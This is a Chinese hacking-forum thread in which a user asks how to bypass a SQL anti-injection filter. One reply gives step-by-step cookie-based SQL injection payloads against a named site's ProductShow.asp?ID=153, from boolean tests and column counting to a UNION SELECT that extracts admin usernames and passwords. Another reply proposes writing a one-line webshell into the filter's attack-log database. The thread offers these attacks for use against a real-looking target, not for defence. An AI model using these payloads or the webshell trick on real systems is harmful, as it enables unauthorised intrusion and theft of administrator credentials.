查看: 3285|回复: 8

求大神,过防注入!

[复制链接]
发表于 2014-6-30 04:36:16 | 显示全部楼层 |阅读模式
悬赏9i币未解决
大家看看,怎么过该Sql防注入系统,遇到过好几次了。  爆菊
QQ截图20140630043515.png

回复

使用道具 举报

发表于 2014-6-30 05:54:45 | 显示全部楼层
[注入语句:javascript:alert(document.cookie="ID="+escape("153"));
找个带参数的链接……http://www.zyjfsh.com/ProductShow.asp?ID=153
看见没有,有防注入系统……但大多可以通过中转注入搞定 我这就手工来COOKIE注入吧!
现在来检测能不能注入……javascript:alert(document.cookie="ID="+escape("153 and 1=1"));
and 1=1返回 正常页面 javascript:alert(document.cookie="ID="+escape("153 and 1=2"));
and 1=2出错 说明存在注入漏洞
然后我们构造语句来查询字段:javascript:alert(document.cookie="ID="+escape("153 order by 10"));正常 再往上猜javascript:alert(document.cookie="ID="+escape("153 order by 20"));
20也正常 再加 javascript:alert(document.cookie="ID="+escape("153 order by 30"));
30出错,说明大于20小于30  javascript:alert(document.cookie="ID="+escape("153 order by 25"));
25也正常 大于25小于30     javascript:alert(document.cookie="ID="+escape("153 order by 26"));
26正常                    javascript:alert(document.cookie="ID="+escape("153 order by 27"));
27出错  说明就是26
接着构造语句查表          javascript:alert(document.cookie="ID="+escape("153 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin"));
2 7 9 15 3是显示位  我们随便找两个显示位来显示就行了
然后猜表里的字段:javascript:alert(document.cookie="ID="+escape("153 union select 1,username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin"));/color]

点评

不存在COOKIE注入。  详情 回复 发表于 2014-6-30 15:26
不存在COOKIE注入。  详情 回复 发表于 2014-6-30 15:26
回复

使用道具 举报

发表于 2014-6-30 06:23:02 | 显示全部楼层
你不能详细的说明问题么  

点评

过滤"select","'","and","or","union",";"等等,大小写也无用,转换字符无用,用sqlmap tamper测试也无果,不存在COOKIE注入。  详情 回复 发表于 2014-6-30 15:26
回复

使用道具 举报

发表于 2014-6-30 11:26:41 | 显示全部楼层
COOKIE试试

点评

不存在COOKIE注入。  详情 回复 发表于 2014-6-30 15:27
回复

使用道具 举报

 楼主| 发表于 2014-6-30 15:26:12 | 显示全部楼层
神仙 发表于 2014-6-30 06:23
你不能详细的说明问题么

过滤"select","'","and","or","union",";"等等,大小写也无用,转换字符无用,用sqlmap tamper测试也无果,不存在COOKIE注入。
回复

使用道具 举报

 楼主| 发表于 2014-6-30 15:26:29 | 显示全部楼层
zyc2483 发表于 2014-6-30 05:54
[注入语句:javascript:alert(document.cookie="ID="+escape("153"));
找个带参数的链接……http://www.zyj ...

不存在COOKIE注入。
回复

使用道具 举报

 楼主| 发表于 2014-6-30 15:26:53 | 显示全部楼层
zyc2483 发表于 2014-6-30 05:54
[注入语句:javascript:alert(document.cookie="ID="+escape("153"));
找个带参数的链接……http://www.zyj ...

不存在COOKIE注入。
回复

使用道具 举报

 楼主| 发表于 2014-6-30 15:27:08 | 显示全部楼层

不存在COOKIE注入。
回复

使用道具 举报

发表于 2014-7-1 15:28:26 | 显示全部楼层
貌似这个防注入系统只有一个办法就是 直接插一句话。 在参数那里  因为那个系统会保存下每一次的恶意操作到数据库中。如果数据库的后缀是可解析的。。 那就可以连接一句话了。 找不到数据库就没办法了。。 坐等大神解答
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-3 04:45 , Processed in 0.163312 second(s), 25 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部